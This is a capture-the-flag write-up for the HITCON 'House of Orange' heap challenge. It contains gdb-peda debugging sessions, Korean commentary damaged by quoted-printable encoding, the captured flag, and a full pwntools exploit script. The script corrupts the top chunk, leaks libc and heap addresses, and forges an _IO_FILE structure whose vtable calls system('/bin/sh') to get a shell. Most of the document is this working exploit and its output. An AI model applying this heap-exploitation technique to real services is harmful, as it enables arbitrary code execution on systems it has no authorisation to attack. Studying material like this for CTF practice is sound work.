=Name of= house : LEAKADD ?!??? Price of orange : 400 __ =20 \/.--, =20 //_.' =20 .-""-/""----.. =20 / . . . . . . . \ =20 / . . \ . . / . . \ =20 |. ____\ . /____. | =20 \ . . . . . . . . | =20 \. . . . . . . . ./ =20 \ . . . =EF=BD=9E . . ./ =20 '-.__.__.__._-' =20 +++++++++++++++++++++++++++++++++++++ @ House of Orange @ +++++++++++++++++++++++++++++++++++++ 1. Build the house =20 2. See the house =20 3. Upgrade the house =20 4. Give up =20 +++++++++++++++++++++++++++++++++++++ Your choice : 3 Length of name :1024 Name:BBBBBBBBBBBBBBB Breakpoint 4, 0x000055555555511e in ?? () gdb-peda$ x/10gx 0x5555557580d0 0x5555557580d0:=090x4242424242424242=090x0a42424242424242 0x5555557580e0:=090x00005555557580c0=090x00005555557580c0 0x5555557580f0:=090x0000000000000000=090x0000000000000000 0x555555758100:=090x0000000000000000=090x0000000000000000 0x555555758110:=090x0000000000000000=090x0000000000000000 gdb-peda$ c Continuing. Price of Orange: 500 +++++++++++++++++++++++++++++++++++++ 1. Red =20 2. Green =20 3. Yellow =20 4. Blue =20 5. Purple =20 6. Cyan =20 7. White =20 +++++++++++++++++++++++++++++++++++++ Color of Orange: 5 Finish +++++++++++++++++++++++++++++++++++++ @ House of Orange @ +++++++++++++++++++++++++++++++++++++ 1. Build the house =20 2. See the house =20 3. Upgrade the house =20 4. Give up =20 +++++++++++++++++++++++++++++++++++++ Your choice : 2 Name of house : BBBBBBBBBBBBBBB ??uUUU Price of orange : 500 __ =20 \/.--, =20 //_.' =20 .-""-/""----.. =20 / . . . . . . . \ =20 / . . . . . . . . \ =20 |. =CF=89=CF=89=CF=89=CF=89 . .=CF=89=CF=89=CF=89=CF=89. | =20 \ . $$. . . $$. ..| =20 \. . . . . . . . ./ =20 \ . . . O . . . / =20 '-.__.__.__._-' =20 +++++++++++++++++++++++++++++++++++++ @ House of Orange @ +++++++++++++++++++++++++++++++++++++ 1. Build the house =20 2. See the house =20 3. Upgrade the house =20 4. Give up =20 +++++++++++++++++++++++++++++++++++++ Your choice :
=EB=B6=84=EC=84=9D=EC=9D=84 =EC=9C=84=ED=95=B4 "0x555555555119"=EC= =98=81=EC=97=AD=EC=97=90 Break point=EB=A5=BC =EC=84=A4=EC=A0=95=ED=95=A9= =EB=8B=88=EB=8B=A4.
"Length of name" =EC=9D=98 =EC=9E=85=EB=A0=A5 =EA=B0=92=EC=9C=BC=EB= =A1=9C "2048"=EB=A5=BC =EC=A0=84=EB=8B=AC=ED=95=A9=EB=8B=88=EB=8B=A4.
= li>=EC=A4=91=EC=9A=94=ED=95=9C =EB=B6=80=EB=B6=84=EC=9D=80 =ED= =98=84=EC=9E=AC main_arena=EC=9D=98 Unsorted bin=EC=97=90 =EC=A0=80=EC=9E= =A5=EB=90=9C =EC=98=81=EC=97=AD=EC=9E=85=EB=8B=88=EB=8B=A4.
Unsorted bin=EC=98=81=EC=97=AD=EC=97=90 =EC=A0=80=EC=9E=A5=EB=90=9C = =EC=98=81=EC=97=AD=EC=9D=80 0x5555557584f0 =EC=9E=85=EB=8B=88=EB=8B=A4= .
Your ch= oice : 2 Name of house : BBBBBBBBBBBBBBB ??uUUU Price of orange : 500 __ =20 \/.--, =20 //_.' =20 .---//------.. =20 / . . . . . . . \ =20 / . ./\. . ./\ .. \ =20 |. ./ \. ./ \ . | =20 \ . . . . . . . ..| =20 \. . . . . . . . ./ =20 \ . . \___/. . ./ =20 '-.__.__.__._-' =20 +++++++++++++++++++++++++++++++++++++ @ House of Orange @ +++++++++++++++++++++++++++++++++++++ 1. Build the house =20 2. See the house =20 3. Upgrade the house =20 4. Give up =20 +++++++++++++++++++++++++++++++++++++ Your choice : ^C Program received signal SIGINT, Interrupt. gdb-peda$ b *0x555555554000 + 0x1119 Breakpoint 5 at 0x555555555119 gdb-peda$ c 3 Length of name :2048 Name: Breakpoint 5, 0x0000555555555119 in ?? () gdb-peda$ i r rdi rdi 0x5555557580d0=090x5555557580d0 gdb-peda$ p main_arena.bins[0] $8 =3D (mchunkptr) 0x5555557584f0 gdb-peda$ p main_arena.bins[1] $9 =3D (mchunkptr) 0x5555557584f0 gdb-peda$ p/d 0x5555557584f0 - 0x5555557580d0 $10 =3D 1056 gdb-peda$ x/8gx 0x5555557580d0 + 1040 0x5555557584e0:=090x00000023000001f4=090x0000000000000000 0x5555557584f0:=090x0000000000000000=090x0000000000000af1 0x555555758500:=090x00007ffff7dd1b78=090x00007ffff7dd1b78 0x555555758510:=090x0000000000000000=090x0000000000000000 gdb-peda$ c AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB Breakpoint 4, 0x000055555555511e in ?? () gdb-peda$ x/8gx 0x5555557580d0 + 1040 0x5555557584e0:=090x4141414141414141=090x4141414141414141 0x5555557584f0:=090x4242424242424242=090x4242424242424242 0x555555758500:=090x4242424242424242=090x4242424242424242 0x555555758510:=090x0000000000000000=090x0000000000000000 gdb-peda$
Breakpo= int 4, 0x000055555555511e in ?? () gdb-peda$ set *0x5555557584f0 =3D 0x6E69622F gdb-peda$ set *0x5555557584f4 =3D 0x0068732F gdb-peda$ set *0x5555557584f8 =3D 0x61 gdb-peda$ set *0x5555557584fc =3D 0x0 gdb-peda$ p &_IO_list_all $1 =3D (struct _IO_FILE_plus **) 0x7ffff7dd2520 <_IO_list_all> gdb-peda$ p/x 0x7ffff7dd2520 - 0x10 $2 =3D 0x7ffff7dd2510 gdb-peda$ x/4gx 0x7ffff7dd2510 0x7ffff7dd2510:=090x0000000000000000=090x0000000000000000 0x7ffff7dd2520 <_IO_list_all>:=090x00007ffff7dd2540=090x0000000000000= 000 gdb-peda$ set *0x555555758508 =3D 0xf7dd2510 gdb-peda$ set *0x55555575850c =3D 0x7fff gdb-peda$ set *0x555555758500 =3D 0xAAAA gdb-peda$ set *0x555555758504 =3D 0x0 gdb-peda$ x/8gx 0x5555557580d0 + 1040 0x5555557584e0:=090x4141414141414141=090x4141414141414141 0x5555557584f0:=090x0068732f6e69622f=090x0000000000000061 0x555555758500:=090x000000000000aaaa=090x00007ffff7dd2510 0x555555758510:=090x000000000000000a=090x0000000000000000 gdb-peda$
gdb-ped= a$ c Continuing. Price of Orange: 700 +++++++++++++++++++++++++++++++++++++ 1. Red =20 2. Green =20 3. Yellow =20 4. Blue =20 5. Purple =20 6. Cyan =20 7. White =20 +++++++++++++++++++++++++++++++++++++ Color of Orange: 7 Finish +++++++++++++++++++++++++++++++++++++ @ House of Orange @ +++++++++++++++++++++++++++++++++++++ 1. Build the house =20 2. See the house =20 3. Upgrade the house =20 4. Give up =20 +++++++++++++++++++++++++++++++++++++ Your choice : 1 *** Error in `/home/lazenca0x0/CTF/HITCON/houseoforange/houseoforange': mal= loc(): memory corruption: 0x00007ffff7dd2520 *** =3D=3D=3D=3D=3D=3D=3D Backtrace: =3D=3D=3D=3D=3D=3D=3D=3D=3D /lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7ffff7a847e5] /lib/x86_64-linux-gnu/libc.so.6(+0x8213e)[0x7ffff7a8f13e] /lib/x86_64-linux-gnu/libc.so.6(__libc_malloc+0x54)[0x7ffff7a91184] /home/lazenca0x0/CTF/HITCON/houseoforange/houseoforange(+0xd6d)[0x555555554= d6d] /home/lazenca0x0/CTF/HITCON/houseoforange/houseoforange(+0x1402)[0x55555555= 5402] /lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7ffff7a2d830] /home/lazenca0x0/CTF/HITCON/houseoforange/houseoforange(+0xb19)[0x555555554= b19] =3D=3D=3D=3D=3D=3D=3D Memory map: =3D=3D=3D=3D=3D=3D=3D=3D 555555554000-555555557000 r-xp 00000000 08:01 139888 /h= ome/lazenca0x0/CTF/HITCON/houseoforange/houseoforange 555555756000-555555757000 r--p 00002000 08:01 139888 /h= ome/lazenca0x0/CTF/HITCON/houseoforange/houseoforange 555555757000-555555758000 rw-p 00003000 08:01 139888 /h= ome/lazenca0x0/CTF/HITCON/houseoforange/houseoforange 555555758000-55555579b000 rw-p 00000000 00:00 0 [h= eap] 7ffff0000000-7ffff0021000 rw-p 00000000 00:00 0=20 7ffff0021000-7ffff4000000 ---p 00000000 00:00 0=20 7ffff77f7000-7ffff780d000 r-xp 00000000 08:01 660756 /l= ib/x86_64-linux-gnu/libgcc_s.so.1 7ffff780d000-7ffff7a0c000 ---p 00016000 08:01 660756 /l= ib/x86_64-linux-gnu/libgcc_s.so.1 7ffff7a0c000-7ffff7a0d000 rw-p 00015000 08:01 660756 /l= ib/x86_64-linux-gnu/libgcc_s.so.1 
7ffff7a0d000-7ffff7bcd000 r-xp 00000000 08:01 655589 /l= ib/x86_64-linux-gnu/libc-2.23.so 7ffff7bcd000-7ffff7dcd000 ---p 001c0000 08:01 655589 /l= ib/x86_64-linux-gnu/libc-2.23.so 7ffff7dcd000-7ffff7dd1000 r--p 001c0000 08:01 655589 /l= ib/x86_64-linux-gnu/libc-2.23.so 7ffff7dd1000-7ffff7dd3000 rw-p 001c4000 08:01 655589 /l= ib/x86_64-linux-gnu/libc-2.23.so 7ffff7dd3000-7ffff7dd7000 rw-p 00000000 00:00 0=20 7ffff7dd7000-7ffff7dfd000 r-xp 00000000 08:01 655548 /l= ib/x86_64-linux-gnu/ld-2.23.so 7ffff7fd5000-7ffff7fd8000 rw-p 00000000 00:00 0=20 7ffff7ff5000-7ffff7ff8000 rw-p 00000000 00:00 0=20 7ffff7ff8000-7ffff7ffa000 r--p 00000000 00:00 0 [v= var] 7ffff7ffa000-7ffff7ffc000 r-xp 00000000 00:00 0 [v= dso] 7ffff7ffc000-7ffff7ffd000 r--p 00025000 08:01 655548 /l= ib/x86_64-linux-gnu/ld-2.23.so 7ffff7ffd000-7ffff7ffe000 rw-p 00026000 08:01 655548 /l= ib/x86_64-linux-gnu/ld-2.23.so 7ffff7ffe000-7ffff7fff000 rw-p 00000000 00:00 0=20 7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [s= tack] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [v= syscall] Program received signal SIGABRT, Aborted. Stopped reason: SIGABRT 0x00007ffff7a42428 in __GI_raise (sig=3Dsig@entry=3D0x6) at ../sysdeps/unix= /sysv/linux/raise.c:54 54=09../sysdeps/unix/sysv/linux/raise.c: No such file or directory. gdb-peda$ x/4gx 0x7ffff7dd2510 0x7ffff7dd2510:=090x0000000000000000=090x0000000000000000 0x7ffff7dd2520 <_IO_list_all>:=090x00007ffff7dd1b78=090x0000000000000= 000 gdb-peda$ p &main_arena.top $14 =3D (mchunkptr *) 0x7ffff7dd1b78 <main_arena+88> gdb-peda$=20 gdb-peda$ x/gx 0x00007ffff7dd1b78 0x7ffff7dd1b78 <main_arena+88>:=090x000055555577a010 gdb-peda$
from pwn = import * p =3D process('./houseoforange_22785bece84189e632567da38e4be0e0c4bb1682') libc =3D ELF('/lib/x86_64-linux-gnu/libc-2.23.so') def Build(len,name): p.recvuntil('Your choice : ') p.sendline('1') p.recvuntil('Length of name :') p.sendline(str(len)) p.recvuntil('Name :') p.sendline(name) p.recvuntil('Price of Orange:') p.sendline(str(100)) p.recvuntil('Color of Orange:') p.sendline(str(1)) def See(): p.recvuntil('Your choice : ') p.sendline('2') tmp =3D p.recvuntil('Price') data =3D (tmp.split('\n')[1]).ljust(8,'\x00')=09 return data def Upgrade(len,name): p.recvuntil('Your choice : ') p.sendline('3') p.recvuntil('Length of name :') p.sendline(str(len)) p.recvuntil('Name:') p.sendline(name) p.recvuntil('Price of Orange:') p.sendline(str(200)) p.recvuntil('Color of Orange:') p.sendline(str(2)) Build(128,'HEAP') #Change top size payload =3D 'A' * 144 payload +=3D p32(0xDEAD) + p32(0x20) + p64(0) payload +=3D p64(0) + p64(0xf31) Upgrade(177,payload) Build(4096,"HEAP") #Leak Libc Address Build(1024,"LEAKADD") leakLibcAddr =3D u64(See()) libcAddrBase =3D leakLibcAddr - 0x3c5188 log.info('Leak Libc Addr : ' + hex(leakLibcAddr)) log.info('Leak Liba Addr Base : ' + hex(libcAddrBase)) #Leak Heap Address Upgrade(1024,'B'*15) leakHeapAddr =3D u64(See()) leakHeapAddr -=3D 0x130 log.info('Leak Heap Addr : ' + hex(leakHeapAddr)) #Payload Info io_list_all =3D libcAddrBase + libc.symbols['_IO_list_all'] system =3D libcAddrBase + libc.symbols['system'] vtable =3D leakHeapAddr + 0x658 =20 log.info('io_list_all : ' + hex(io_list_all)) log.info('system : ' + hex(system)) log.info('vtable : ' + hex(vtable)) payload =3D "C" * 1056 #Write to "Fake struct _IO_FILE_plus", " Fake struct _IO_wide_data" stream =3D "/bin/sh\x00" + p64(0x61) stream +=3D p64(0xddaa) + p64(io_list_all-0x10) stream =3D stream.ljust(0xa0,"\x00") stream +=3D p64(leakHeapAddr+0x700-0xd0) stream =3D stream.ljust(0xc0,"\x00") stream +=3D p64(1) payload +=3D stream payload +=3D p64(0)*2 payload +=3D 
p64(vtable) payload +=3D p64(1) payload +=3D p64(2) payload +=3D p64(3) payload +=3D p64(0)*3 payload +=3D p64(system) Upgrade(2048,payload) p.recvuntil(":") p.sendline("1") =20 p.interactive()
Flag | hitcon{Y0ur_4r3_the_g0d_of_h34p_= 4nd_Or4ng3_is_s0_4ngry} |
---|
<= /p>